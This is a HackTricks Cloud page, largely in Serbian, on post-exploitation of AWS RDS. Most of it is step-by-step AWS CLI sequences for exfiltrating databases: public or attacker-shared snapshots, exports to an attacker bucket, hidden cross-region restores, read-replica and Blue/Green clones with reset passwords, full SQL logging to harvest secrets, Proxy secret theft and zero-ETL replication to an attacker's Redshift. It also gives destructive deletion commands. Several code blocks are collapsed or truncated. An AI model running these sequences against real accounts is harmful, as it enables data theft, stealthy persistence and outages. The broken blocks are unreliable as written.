HackTricks CloudAWS - RDS Post Exploitation
Tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
RDS
Za više informacija pogledajte:
AWS - Relational Database (RDS) Enum
rds:CreateDBSnapshot, rds:RestoreDBInstanceFromDBSnapshot, rds:ModifyDBInstance
Ako napadač ima dovoljno dozvola, može učiniti DB javno dostupnom kreiranjem snapshot-a baze, a zatim kreiranjem javno dostupne DB iz tog snapshot-a.
aws rds describe-db-instances # Get DB identifier
aws rds create-db-snapshot \
--db-instance-identifier <db-id> \
--db-snapshot-identifier cloudgoat
# Get subnet groups & security groups
aws rds describe-db-subnet-groups
aws ec2 describe-security-groups
aws rds restore-db-instance-from-db-snapshot \
--db-instance-identifier "new-db-not-malicious" \
--db-snapshot-identifier <scapshotId> \
--db-subnet-group-name <db subnet group> \
--publicly-accessible \
--vpc-security-group-ids <ec2-security group>
aws rds modify-db-instance \
--db-instance-identifier "new-db-not-malicious" \
--master-user-password 'Llaody2f6.123' \
--apply-immediately
# Connect to the new DB after a few mins
rds:StopDBCluster & rds:StopDBInstance
Napadač koji ima rds:StopDBCluster ili rds:StopDBInstance može prisiliti trenutno zaustavljanje RDS instance ili čitavog klastera, što izaziva nedostupnost baze podataka, prekinute konekcije i prekid procesa koji zavise od baze.
Da biste zaustavili jednu DB instancu (пример):
aws rds stop-db-instance \
--db-instance-identifier <DB_INSTANCE_IDENTIFIER>
Da zaustavite čitav DB cluster (primer):
aws rds stop-db-cluster \
--db-cluster-identifier <DB_CLUSTER_IDENTIFIER>
rds:Modify*
Napadač kome su dodeljena rds:Modify* ovlašćenja može izmeniti kritične konfiguracije i pomoćne resurse (parameter groups, option groups, proxy endpoints and endpoint-groups, target groups, subnet groups, capacity settings, snapshot/cluster attributes, certificates, integrations, etc.) bez direktnog dodirivanja instance or cluster direktno. Promene kao što su podešavanje connection/time-out parameters, menjanje a proxy endpoint, modifikovanje koje certificates su trusted, menjanje logical capacity, ili rekonfigurisanje subnet group mogu oslabiti bezbednost (open new access paths), pokvariti routing i load-balancing, poništiti replication/backup policies, i generalno degradirati availability ili recoverability. Ove izmene takođe mogu olakšati indirektnu data exfiltration ili otežati uredan recovery baze podataka nakon incidenta.
Premestiti ili promeniti subnets dodeljene RDS subnet group:
aws rds modify-db-subnet-group \
--db-subnet-group-name <db-subnet-group-name> \
--subnet-ids <subnet-id-1> <subnet-id-2>
Izmenite niskonivske parametre engine-a u cluster parameter group:
aws rds modify-db-cluster-parameter-group \
--db-cluster-parameter-group-name <parameter-group-name> \
--parameters "ParameterName=<parameter-name>,ParameterValue=<value>,ApplyMethod=immediate"
rds:Restore*
Napadač sa rds:Restore* privilegijama može vratiti čitave baze podataka iz snapshots, automated backups, point-in-time recovery (PITR) ili fajlova smeštenih u S3, kreirajući nove instance ili klastere popunjene podacima iz izabranog trenutka. Ove operacije ne prepisuju originalne resurse — one kreiraju nove objekte koji sadrže istorijske podatke — što napadaču omogućava da dobije pune, funkcionalne kopije baze podataka (iz prošlih tačaka u vremenu ili iz eksternih S3 fajlova) i upotrebi ih da exfiltrate podatke, manipuliše istorijskim zapisima ili obnovi prethodna stanja.
Vraćanje DB instance na određenu tačku u vremenu:
aws rds restore-db-instance-to-point-in-time \
--source-db-instance-identifier <source-db-instance-identifier> \
--target-db-instance-identifier <target-db-instance-identifier> \
--restore-time "<restore-time-ISO8601>" \
--db-instance-class <db-instance-class> \
--publicly-accessible --no-multi-az
rds:Delete*
Napadač kojem je dodeljena dozvola rds:Delete* može ukloniti RDS resurse — izbrisati DB instance, klastere, snapshot-ove, automatske rezervne kopije, subnet grupe, grupe parametara/opcija i povezane artefakte — što može prouzrokovati trenutni prekid usluge, gubitak podataka, uništenje tačaka oporavka i gubitak forenzičkih dokaza.
# Delete a DB instance (creates a final snapshot unless you skip it)
aws rds delete-db-instance \
--db-instance-identifier <DB_INSTANCE_ID> \
--final-db-snapshot-identifier <FINAL_SNAPSHOT_ID> # omit or replace with --skip-final-snapshot to avoid snapshot
# Delete a DB instance and skip final snapshot (more destructive)
aws rds delete-db-instance \
--db-instance-identifier <DB_INSTANCE_ID> \
--skip-final-snapshot
# Delete a manual DB snapshot
aws rds delete-db-snapshot \
--db-snapshot-identifier <DB_SNAPSHOT_ID>
# Delete an Aurora DB cluster (creates a final snapshot unless you skip)
aws rds delete-db-cluster \
--db-cluster-identifier <DB_CLUSTER_ID> \
--final-db-snapshot-identifier <FINAL_CLUSTER_SNAPSHOT_ID> # or use --skip-final-snapshot
rds:ModifyDBSnapshotAttribute, rds:CreateDBSnapshot
Napadač sa ovim permisijama može napraviti snapshot DB i učiniti ga javno dostupnim. Zatim može jednostavno u svom nalogu napraviti DB iz tog snapshot-a.
Ako napadač nema rds:CreateDBSnapshot, i dalje može učiniti druge napravljene snapshot-e javnim.
# create snapshot
aws rds create-db-snapshot --db-instance-identifier <db-instance-identifier> --db-snapshot-identifier <snapshot-name>
# Make it public/share with attackers account
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}
rds:DownloadDBLogFilePortion
Napadač sa dozvolom rds:DownloadDBLogFilePortion može preuzeti delove log fajlova RDS instance. Ako su osetljivi podaci ili pristupne informacije slučajno zabeležene u logovima, napadač bi mogao iskoristiti te informacije za eskalaciju privilegija ili izvršavanje neovlašćenih radnji.
aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text
Potencijalni uticaj: Pristup osetljivim informacijama ili neovlašćene akcije koristeći leaked credentials.
rds:DeleteDBInstance
Napadač sa ovim dozvolama može izvršiti DoS nad postojećim RDS instancama.
# Delete
aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot
Potencijalni uticaj: Brisanje postojećih RDS instanci i potencijalni gubitak podataka.
rds:StartExportTask
Note
TODO: Testirati
Napadač sa ovom dozvolom može izvesti snapshot RDS instance u S3 bucket. Ako napadač ima kontrolu nad ciljnim S3 bucket-om, može potencijalno pristupiti osetljivim podacima u izvezenom snapshotu.
aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id
Potencijalni uticaj: Pristup osetljivim podacima u eksportovanom snapshot-u.
Replikacija automatizovanih backup-ova između regiona za prikriveni restore (rds:StartDBInstanceAutomatedBackupsReplication)
Iskoristite replikaciju automatizovanih backup-ova između regiona da tiho duplirate automatizovane backupe RDS instance u drugi AWS Region i tamo izvršite restore. Napadač potom može učiniti obnovljenu DB javno dostupnom i resetovati master lozinku kako bi pristupio podacima izvan nadzora u Region-u koji odbrambeni timovi možda ne prate.
Potrebne permisije (minimum):
rds:StartDBInstanceAutomatedBackupsReplicationu odredišnom Region-urds:DescribeDBInstanceAutomatedBackupsu odredišnom Region-urds:RestoreDBInstanceToPointInTimeu odredišnom Region-urds:ModifyDBInstanceu odredišnom Region-urds:StopDBInstanceAutomatedBackupsReplication(opciono čišćenje)ec2:CreateSecurityGroup,ec2:AuthorizeSecurityGroupIngress(da bi se izložila obnovljena DB)
Uticaj: Persistencija i eksfiltracija podataka putem restauracije kopije produkcijskih podataka u drugi Region i javnog izlaganja uz kredencijale pod kontrolom napadača.
Kraj-do-kraja CLI (zameni placeholder-e)
```bash # 1) Recon (SOURCE region A) aws rds describe-db-instances \ --region2) Start cross-Region automated backups replication (run in DEST region B)
aws rds start-db-instance-automated-backups-replication
–region <DEST_REGION>
–source-db-instance-arn <SOURCE_DB_INSTANCE_ARN>
–source-region <SOURCE_REGION>
–backup-retention-period 7
3) Wait for replication to be ready in DEST
aws rds describe-db-instance-automated-backups
–region <DEST_REGION>
–query ‘DBInstanceAutomatedBackups[*].[DBInstanceAutomatedBackupsArn,DBInstanceIdentifier,Status]’
–output table
Proceed when Status is “replicating” or “active” and note the DBInstanceAutomatedBackupsArn
4) Restore to latest restorable time in DEST
aws rds restore-db-instance-to-point-in-time
–region <DEST_REGION>
–source-db-instance-automated-backups-arn <AUTO_BACKUP_ARN>
–target-db-instance-identifier <TARGET_DB_ID>
–use-latest-restorable-time
–db-instance-class db.t3.micro
aws rds wait db-instance-available –region <DEST_REGION> –db-instance-identifier <TARGET_DB_ID>
5) Make public and reset credentials in DEST
5a) Create/choose an open SG permitting TCP/3306 (adjust engine/port as needed)
OPEN_SG_ID=$(aws ec2 create-security-group –region <DEST_REGION>
–group-name open-rds-
–query GroupId –output text)
aws ec2 authorize-security-group-ingress –region <DEST_REGION>
–group-id “$OPEN_SG_ID”
–ip-permissions IpProtocol=tcp,FromPort=3306,ToPort=3306,IpRanges=‘[{CidrIp=0.0.0.0/0}]’
5b) Publicly expose restored DB and attach the SG
aws rds modify-db-instance –region <DEST_REGION>
–db-instance-identifier <TARGET_DB_ID>
–publicly-accessible
–vpc-security-group-ids “$OPEN_SG_ID”
–apply-immediately
aws rds wait db-instance-available –region <DEST_REGION> –db-instance-identifier <TARGET_DB_ID>
5c) Reset the master password
aws rds modify-db-instance –region <DEST_REGION>
–db-instance-identifier <TARGET_DB_ID>
–master-user-password ‘<NEW_STRONG_PASSWORD>’
–apply-immediately
aws rds wait db-instance-available –region <DEST_REGION> –db-instance-identifier <TARGET_DB_ID>
6) Connect to <TARGET_DB_ID> endpoint and validate data (example for MySQL)
ENDPOINT=$(aws rds describe-db-instances –region <DEST_REGION>
–db-instance-identifier <TARGET_DB_ID>
–query ‘DBInstances[0].Endpoint.Address’ –output text)
mysql -h “$ENDPOINT” -u <MASTER_USERNAME> -p’<NEW_STRONG_PASSWORD>’ -e ‘SHOW DATABASES;’
7) Optional: stop replication
aws rds stop-db-instance-automated-backups-replication
–region <DEST_REGION>
–source-db-instance-arn <SOURCE_DB_INSTANCE_ARN>
</details>
### Omogućite full SQL logging via DB parameter groups and exfiltrate via RDS log APIs
Iskoristite `rds:ModifyDBParameterGroup` zajedno sa RDS log download APIs da zabeležite sve SQL izjave koje aplikacije izvršavaju (nije potrebna DB engine credentials). Omogućite engine SQL logging i preuzmite fajl logove putem `rds:DescribeDBLogFiles` i `rds:DownloadDBLogFilePortion` (ili REST `downloadCompleteLogFile`). Korisno za prikupljanje upita koji mogu sadržati secrets/PII/JWTs.
Potrebne dozvole (minimum):
- `rds:DescribeDBInstances`, `rds:DescribeDBLogFiles`, `rds:DownloadDBLogFilePortion`
- `rds:CreateDBParameterGroup`, `rds:ModifyDBParameterGroup`
- `rds:ModifyDBInstance` (samo za priključivanje custom parameter group ako instanca koristi default)
- `rds:RebootDBInstance` (za parametre koji zahtevaju reboot, npr. PostgreSQL)
Koraci
1) Recon target i trenutni parameter group
```bash
aws rds describe-db-instances \
--query 'DBInstances[*].[DBInstanceIdentifier,Engine,DBParameterGroups[0].DBParameterGroupName]' \
--output table
- Osigurajte da je prikačen prilagođeni DB parameter group (default se ne može menjati)
- Ako instanca već koristi prilagođeni DB parameter group, iskoristite njegovo ime u narednom koraku.
- U suprotnom, kreirajte i prikačite jedan koji odgovara engine family:
# Example for PostgreSQL 16
aws rds create-db-parameter-group \
--db-parameter-group-name ht-logs-pg \
--db-parameter-group-family postgres16 \
--description "HT logging"
aws rds modify-db-instance \
--db-instance-identifier <DB> \
--db-parameter-group-name ht-logs-pg \
--apply-immediately
# Wait until status becomes "available"
- Omogućite detaljno SQL logovanje
- MySQL engines (odmah / bez ponovnog pokretanja):
aws rds modify-db-parameter-group \
--db-parameter-group-name <PGNAME> \
--parameters \
"ParameterName=general_log,ParameterValue=1,ApplyMethod=immediate" \
"ParameterName=log_output,ParameterValue=FILE,ApplyMethod=immediate"
# Optional extras:
# "ParameterName=slow_query_log,ParameterValue=1,ApplyMethod=immediate" \
# "ParameterName=long_query_time,ParameterValue=0,ApplyMethod=immediate"
- PostgreSQL engines (reboot required):
aws rds modify-db-parameter-group \
--db-parameter-group-name <PGNAME> \
--parameters \
"ParameterName=log_statement,ParameterValue=all,ApplyMethod=pending-reboot"
# Optional to log duration for every statement:
# "ParameterName=log_min_duration_statement,ParameterValue=0,ApplyMethod=pending-reboot"
# Reboot if any parameter is pending-reboot
aws rds reboot-db-instance --db-instance-identifier <DB>
- Dozvolite da workload radi (ili generišite upite). SQL upiti će biti zapisani u engine file logs
- MySQL:
general/mysql-general.log - PostgreSQL:
postgresql.log
- Otkrijte i preuzmite logove (nisu potrebni DB kredencijali)
aws rds describe-db-log-files --db-instance-identifier <DB>
# Pull full file via portions (iterate until AdditionalDataPending=false). For small logs a single call is enough:
aws rds download-db-log-file-portion \
--db-instance-identifier <DB> \
--log-file-name general/mysql-general.log \
--starting-token 0 \
--output text > dump.log
- Analizirajte offline radi pronalaženja osetljivih podataka
grep -Ei "password=|aws_access_key_id|secret|authorization:|bearer" dump.log | sed 's/\(aws_access_key_id=\)[A-Z0-9]*/\1AKIA.../; s/\(secret=\).*/\1REDACTED/; s/\(Bearer \).*/\1REDACTED/' | head
Primer dokaza (redigovano):
2025-10-06T..Z 13 Query INSERT INTO t(note) VALUES ('user=alice password=Sup3rS3cret!')
2025-10-06T..Z 13 Query INSERT INTO t(note) VALUES ('authorization: Bearer REDACTED')
2025-10-06T..Z 13 Query INSERT INTO t(note) VALUES ('aws_access_key_id=AKIA... secret=REDACTED')
Čišćenje
- Vrati parametre na podrazumevane vrednosti i restartuj ako je potrebno:
# MySQL
aws rds modify-db-parameter-group \
--db-parameter-group-name <PGNAME> \
--parameters \
"ParameterName=general_log,ParameterValue=0,ApplyMethod=immediate"
# PostgreSQL
aws rds modify-db-parameter-group \
--db-parameter-group-name <PGNAME> \
--parameters \
"ParameterName=log_statement,ParameterValue=none,ApplyMethod=pending-reboot"
# Reboot if pending-reboot
Impact: Post-exploitation pristup podacima hvatanjem svih application SQL statements putem AWS APIs (no DB creds), potencijalno leaking secrets, JWTs i PII.
rds:CreateDBInstanceReadReplica, rds:ModifyDBInstance
Iskoristiti RDS read replicas da se dobije out-of-band read access bez diranja credentials primarne instance. Napadač može kreirati read replica iz production instance, resetovati master password na replici (ovo ne menja primary), i opciono izložiti replicu javno radi exfiltrate data.
Permissions needed (minimum):
rds:DescribeDBInstancesrds:CreateDBInstanceReadReplicards:ModifyDBInstanceec2:CreateSecurityGroup,ec2:AuthorizeSecurityGroupIngress(if exposing publicly)
Impact: Read-only access do production podataka preko replike sa attacker-controlled credentials; manja verovatnoća detekcije jer primary ostaje netaknut i replication se nastavlja.
# 1) Recon: find non-Aurora sources with backups enabled
aws rds describe-db-instances \
--query 'DBInstances[*].[DBInstanceIdentifier,Engine,DBInstanceArn,DBSubnetGroup.DBSubnetGroupName,VpcSecurityGroups[0].VpcSecurityGroupId,PubliclyAccessible]' \
--output table
# 2) Create a permissive SG (replace <VPC_ID> and <YOUR_IP/32>)
aws ec2 create-security-group --group-name rds-repl-exfil --description 'RDS replica exfil' --vpc-id <VPC_ID> --query GroupId --output text
aws ec2 authorize-security-group-ingress --group-id <SGID> --ip-permissions '[{"IpProtocol":"tcp","FromPort":3306,"ToPort":3306,"IpRanges":[{"CidrIp":"<YOUR_IP/32>","Description":"tester"}]}]'
# 3) Create the read replica (optionally public)
aws rds create-db-instance-read-replica \
--db-instance-identifier <REPL_ID> \
--source-db-instance-identifier <SOURCE_DB> \
--db-instance-class db.t3.medium \
--publicly-accessible \
--vpc-security-group-ids <SGID>
aws rds wait db-instance-available --db-instance-identifier <REPL_ID>
# 4) Reset ONLY the replica master password (primary unchanged)
aws rds modify-db-instance --db-instance-identifier <REPL_ID> --master-user-password 'NewStr0ng!Passw0rd' --apply-immediately
aws rds wait db-instance-available --db-instance-identifier <REPL_ID>
# 5) Connect and dump (use the SOURCE master username + NEW password)
REPL_ENDPOINT=$(aws rds describe-db-instances --db-instance-identifier <REPL_ID> --query 'DBInstances[0].Endpoint.Address' --output text)
# e.g., with mysql client: mysql -h "$REPL_ENDPOINT" -u <MASTER_USERNAME> -p'NewStr0ng!Passw0rd' -e 'SHOW DATABASES; SELECT @@read_only, CURRENT_USER();'
# Optional: promote for persistence
# aws rds promote-read-replica --db-instance-identifier <REPL_ID>
Primer dokaza (MySQL):
- Status Replica DB-a:
available, replika za čitanje:replicating - Uspešna konekcija sa novom lozinkom i
@@read_only=1koja potvrđuje pristup replici samo za čitanje.
rds:CreateBlueGreenDeployment, rds:ModifyDBInstance
Iskoristite RDS Blue/Green da klonirate produkcioni DB u kontinuirano replicirano, samo za čitanje green okruženje. Zatim resetujte master kredencijale za green da pristupite podacima bez diranja blue (prod) instance. Ovo je diskretnije od deljenja snapshot-a i često zaobilazi monitoring koji je fokusiran isključivo na izvor.
# 1) Recon – find eligible source (non‑Aurora MySQL/PostgreSQL in the same account)
aws rds describe-db-instances \
--query 'DBInstances[*].[DBInstanceIdentifier,DBInstanceArn,Engine,EngineVersion,DBSubnetGroup.DBSubnetGroupName,PubliclyAccessible]'
# Ensure: automated backups enabled on source (BackupRetentionPeriod > 0), no RDS Proxy, supported engine/version
# 2) Create Blue/Green deployment (replicates blue->green continuously)
aws rds create-blue-green-deployment \
--blue-green-deployment-name ht-bgd-attack \
--source <BLUE_DB_ARN> \
# Optional to upgrade: --target-engine-version <same-or-higher-compatible>
# Wait until deployment Status becomes AVAILABLE, then note the green DB id
aws rds describe-blue-green-deployments \
--blue-green-deployment-identifier <BGD_ID> \
--query 'BlueGreenDeployments[0].SwitchoverDetails[0].TargetMember'
# Typical green id: <blue>-green-XXXX
# 3) Reset the green master password (does not affect blue)
aws rds modify-db-instance \
--db-instance-identifier <GREEN_DB_ID> \
--master-user-password 'Gr33n!Exfil#1' \
--apply-immediately
# Optional: expose the green for direct access (attach an SG that allows the DB port)
aws rds modify-db-instance \
--db-instance-identifier <GREEN_DB_ID> \
--publicly-accessible \
--vpc-security-group-ids <SG_ALLOWING_DB_PORT> \
--apply-immediately
# 4) Connect to the green endpoint and query/exfiltrate (green is read‑only)
aws rds describe-db-instances \
--db-instance-identifier <GREEN_DB_ID> \
--query 'DBInstances[0].Endpoint.Address' --output text
# Then connect with the master username and the new password and run SELECT/dumps
# e.g. MySQL: mysql -h <endpoint> -u <master_user> -p'Gr33n!Exfil#1'
# 5) Cleanup – remove blue/green and the green resources
aws rds delete-blue-green-deployment \
--blue-green-deployment-identifier <BGD_ID> \
--delete-target true
Uticaj: Samo za čitanje, ali potpuni pristup podacima na klonu produkcije skoro u realnom vremenu bez izmena produkcione instance. Korisno za prikriveno ekstrahovanje podataka i offline analizu.
Van-kanalni SQL preko RDS Data API omogućavanjem HTTP endpoint-a + resetovanjem master lozinke
Iskoristite Aurora da omogućite RDS Data API HTTP endpoint na ciljanom klasteru, resetujete master lozinku na vrednost pod vašom kontrolom i pokrenete SQL preko HTTPS (nije potrebna VPC mrežna putanja). Radi na Aurora engine-ima koji podržavaju Data API/EnableHttpEndpoint (npr. Aurora MySQL 8.0 provisioned; neke verzije Aurora PostgreSQL/MySQL).
Minimalne dozvole:
- rds:DescribeDBClusters, rds:ModifyDBCluster (or rds:EnableHttpEndpoint)
- secretsmanager:CreateSecret
- rds-data:ExecuteStatement (and rds-data:BatchExecuteStatement if used)
Uticaj: Zaobilaženje mrežne segmentacije i eksfiltracija podataka preko AWS APIs bez direktne VPC konektivnosti do DB.
End-to-end CLI (Aurora MySQL primer)
```bash # 1) Identify target cluster ARN REGION=us-east-1 CLUSTER_ID=2) Enable Data API HTTP endpoint on the cluster
Either of the following (depending on API/engine support):
aws rds enable-http-endpoint –region $REGION –resource-arn “$CLUSTER_ARN”
or
aws rds modify-db-cluster –region $REGION –db-cluster-identifier $CLUSTER_ID
–enable-http-endpoint –apply-immediately
Wait until HttpEndpointEnabled is True
aws rds wait db-cluster-available –region $REGION –db-cluster-identifier $CLUSTER_ID
aws rds describe-db-clusters –region $REGION –db-cluster-identifier $CLUSTER_ID
–query ‘DBClusters[0].HttpEndpointEnabled’ –output text
3) Reset master password to attacker-controlled value
aws rds modify-db-cluster –region $REGION –db-cluster-identifier $CLUSTER_ID
–master-user-password ‘Sup3rStr0ng!1’ –apply-immediately
Wait until pending password change is applied
while :; do
aws rds wait db-cluster-available –region $REGION –db-cluster-identifier $CLUSTER_ID
P=$(aws rds describe-db-clusters –region $REGION –db-cluster-identifier $CLUSTER_ID
–query ‘DBClusters[0].PendingModifiedValues.MasterUserPassword’ –output text)
[[ “$P” == “None” || “$P” == “null” ]] && break
sleep 10
done
4) Create a Secrets Manager secret for Data API auth
SECRET_ARN=$(aws secretsmanager create-secret –region $REGION –name rdsdata/demo-$CLUSTER_ID
–secret-string ‘{“username”:“admin”,“password”:“Sup3rStr0ng!1”}’
–query ARN –output text)
5) Prove out-of-band SQL via HTTPS using rds-data
(Example with Aurora MySQL; for PostgreSQL, adjust SQL and username accordingly)
aws rds-data execute-statement –region $REGION –resource-arn “$CLUSTER_ARN”
–secret-arn “$SECRET_ARN” –database mysql –sql “create database if not exists demo;”
aws rds-data execute-statement –region $REGION –resource-arn “$CLUSTER_ARN”
–secret-arn “$SECRET_ARN” –database demo –sql “create table if not exists pii(note text);”
aws rds-data execute-statement –region $REGION –resource-arn “$CLUSTER_ARN”
–secret-arn “$SECRET_ARN” –database demo –sql “insert into pii(note) values (‘token=SECRET_JWT’);”
aws rds-data execute-statement –region $REGION –resource-arn “$CLUSTER_ARN”
–secret-arn “$SECRET_ARN” –database demo –sql “select current_user(), now(), (select count(*) from pii) as row_count;”
–format-records-as JSON
</details>
Napomene:
- Ako rds-data odbija multi-statement SQL, izvršite zasebne execute-statement pozive.
- Za engine-e kod kojih modify-db-cluster --enable-http-endpoint nema efekta, koristite rds enable-http-endpoint --resource-arn.
- Uverite se da engine/version zaista podržava Data API; u suprotnom HttpEndpointEnabled će ostati False.
### Prikupljanje DB kredencijala putem RDS Proxy auth secrets (`rds:DescribeDBProxies` + `secretsmanager:GetSecretValue`)
Iskoristite RDS Proxy konfiguraciju da otkrijete Secrets Manager secret koji se koristi za backend autentifikaciju, a zatim pročitajte taj secret da biste dobili database credentials. Mnoge okoline dodeljuju široke `secretsmanager:GetSecretValue` dozvole, što ovo čini jednostavnim putem do DB kredencijala. Ako secret koristi CMK, nepravilno ograničene KMS dozvole mogu takođe dozvoliti `kms:Decrypt`.
Potrebne dozvole (minimum):
- `rds:DescribeDBProxies`
- `secretsmanager:GetSecretValue` on the referenced SecretArn
- Optional when the secret uses a CMK: `kms:Decrypt` on that key
Impact: Odmah otkrivanje korisničkog imena i lozinke baze podataka konfigurisanih na proxy-ju; omogućava direktan pristup DB-u ili dalje lateralno kretanje.
Koraci
```bash
# 1) Enumerate proxies and extract the SecretArn used for auth
aws rds describe-db-proxies \
--query DBProxies[*].[DBProxyName,Auth[0].AuthScheme,Auth[0].SecretArn] \
--output table
# 2) Read the secret value (common over-permission)
aws secretsmanager get-secret-value \
--secret-id <SecretArnFromProxy> \
--query SecretString --output text
# Example output: {"username":"admin","password":"S3cr3t!"}
Laboratorija (minimalno za reprodukciju)
REGION=us-east-1
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
SECRET_ARN=$(aws secretsmanager create-secret \
--region $REGION --name rds/proxy/aurora-demo \
--secret-string username:admin \
--query ARN --output text)
aws iam create-role --role-name rds-proxy-secret-role \
--assume-role-policy-document Version:2012-10-17
aws iam attach-role-policy --role-name rds-proxy-secret-role \
--policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite
aws rds create-db-proxy --db-proxy-name p0 --engine-family MYSQL \
--auth [AuthScheme:SECRETS] \
--role-arn arn:aws:iam::$ACCOUNT_ID:role/rds-proxy-secret-role \
--vpc-subnet-ids $(aws ec2 describe-subnets --filters Name=default-for-az,Values=true --query Subnets[].SubnetId --output text)
aws rds wait db-proxy-available --db-proxy-name p0
# Now run the enumeration + secret read from the Steps above
Čišćenje (lab)
aws rds delete-db-proxy --db-proxy-name p0
aws iam detach-role-policy --role-name rds-proxy-secret-role --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite
aws iam delete-role --role-name rds-proxy-secret-role
aws secretsmanager delete-secret --secret-id rds/proxy/aurora-demo --force-delete-without-recovery
Stealthy continuous exfiltration via Aurora zero‑ETL to Amazon Redshift (rds:CreateIntegration)
Iskoristite Aurora PostgreSQL zero‑ETL integraciju za kontinuiranu replikaciju proizvodnih podataka u Redshift Serverless namespace koji kontrolišete. Sa permisivnom Redshift resource policy koja dozvoljava CreateInboundIntegration/AuthorizeInboundIntegration za određen Aurora cluster ARN, napadač može uspostaviti skoro real‑time kopiju podataka bez DB creds, snapshot‑ova ili mrežnog izlaganja.
Permissions needed (minimum):
rds:CreateIntegration,rds:DescribeIntegrations,rds:DeleteIntegrationredshift:PutResourcePolicy,redshift:DescribeInboundIntegrations,redshift:DescribeIntegrationsredshift-data:ExecuteStatement/GetStatementResult/ListDatabases(za upite)rds-data:ExecuteStatement(opciono; za inicijalno ubacivanje podataka ako je potrebno)
Tested on: us-east-1, Aurora PostgreSQL 16.4 (Serverless v2), Redshift Serverless.
1) Kreirajte Redshift Serverless namespace + workgroup
```bash REGION=us-east-1 RS_NS_ARN=$(aws redshift-serverless create-namespace --region $REGION --namespace-name ztl-ns \ --admin-username adminuser --admin-user-password 'AdminPwd-1!' \ --query namespace.namespaceArn --output text) RS_WG_ARN=$(aws redshift-serverless create-workgroup --region $REGION --workgroup-name ztl-wg \ --namespace-name ztl-ns --base-capacity 8 --publicly-accessible \ --query workgroup.workgroupArn --output text) # Wait until AVAILABLE, then enable case sensitivity (required for PostgreSQL) aws redshift-serverless update-workgroup --region $REGION --workgroup-name ztl-wg \ --config-parameters parameterKey=enable_case_sensitive_identifier,parameterValue=true ```2) Konfigurišite politiku resursa za Redshift da dozvoli izvor Aurora
```bash ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text) SRC_ARN=3) Kreirajte Aurora PostgreSQL cluster (omogućite Data API i logičku replikaciju)
```bash CLUSTER_ID=aurora-ztl aws rds create-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \ --engine aurora-postgresql --engine-version 16.4 \ --master-username postgres --master-user-password 'InitPwd-1!' \ --enable-http-endpoint --no-deletion-protection --backup-retention-period 1 aws rds wait db-cluster-available --region $REGION --db-cluster-identifier $CLUSTER_ID # Serverless v2 instance aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \ --serverless-v2-scaling-configuration MinCapacity=0.5,MaxCapacity=1 --apply-immediately aws rds create-db-instance --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1 \ --db-instance-class db.serverless --engine aurora-postgresql --db-cluster-identifier $CLUSTER_ID aws rds wait db-instance-available --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1 # Cluster parameter group for zero‑ETL aws rds create-db-cluster-parameter-group --region $REGION --db-cluster-parameter-group-name apg16-ztl-zerodg \ --db-parameter-group-family aurora-postgresql16 --description "APG16 zero-ETL params" aws rds modify-db-cluster-parameter-group --region $REGION --db-cluster-parameter-group-name apg16-ztl-zerodg --parameters \ ParameterName=rds.logical_replication,ParameterValue=1,ApplyMethod=pending-reboot \ ParameterName=aurora.enhanced_logical_replication,ParameterValue=1,ApplyMethod=pending-reboot \ ParameterName=aurora.logical_replication_backup,ParameterValue=0,ApplyMethod=pending-reboot \ ParameterName=aurora.logical_replication_globaldb,ParameterValue=0,ApplyMethod=pending-reboot aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \ --db-cluster-parameter-group-name apg16-ztl-zerodg --apply-immediately aws rds reboot-db-instance --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1 aws rds wait db-instance-available --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1 SRC_ARN=$(aws rds describe-db-clusters --region $REGION --db-cluster-identifier $CLUSTER_ID --query 'DBClusters[0].DBClusterArn' --output text) ```4) Kreirajte zero‑ETL integraciju iz RDS
```bash # Include all tables in the default 'postgres' database aws rds create-integration --region $REGION --source-arn "$SRC_ARN" \ --target-arn "$RS_NS_ARN" --integration-name ztl-demo \ --data-filter 'include: postgres.*.*' # Redshift inbound integration should become ACTIVE aws redshift describe-inbound-integrations --region $REGION --target-arn "$RS_NS_ARN" ```5) Materijalizujte i izvršite upite nad repliciranim podacima u Redshift
```bash # Create a Redshift database from the inbound integration (use integration_id from SVV_INTEGRATION) aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database dev \ --sql "select integration_id from svv_integration" # take the GUID value aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database dev \ --sql "create database ztl_db from integration 'Dokazi uočeni u testu:
- redshift describe-inbound-integrations: Status ACTIVE za Integration arn:…377a462b-…
- SVV_INTEGRATION je prikazao integration_id 377a462b-c42c-4f08-937b-77fe75d98211 i stanje PendingDbConnectState pre kreiranja DB.
- Nakon CREATE DATABASE FROM INTEGRATION, prikaz tabela je otkrio šemu ztl i tabelu customers; SELECT iz ztl.customers vratio je 2 reda (Alice, Bob).
Uticaj: Continuous near‑real‑time exfiltration izabranih Aurora PostgreSQL tabela u Redshift Serverless pod kontrolom napadača, bez korišćenja database credentials, backups ili network access do izvornog klastera.
Tip
Učite i vežbajte AWS Hacking:
Učite i vežbajte GCP Hacking:Podržite HackTricks
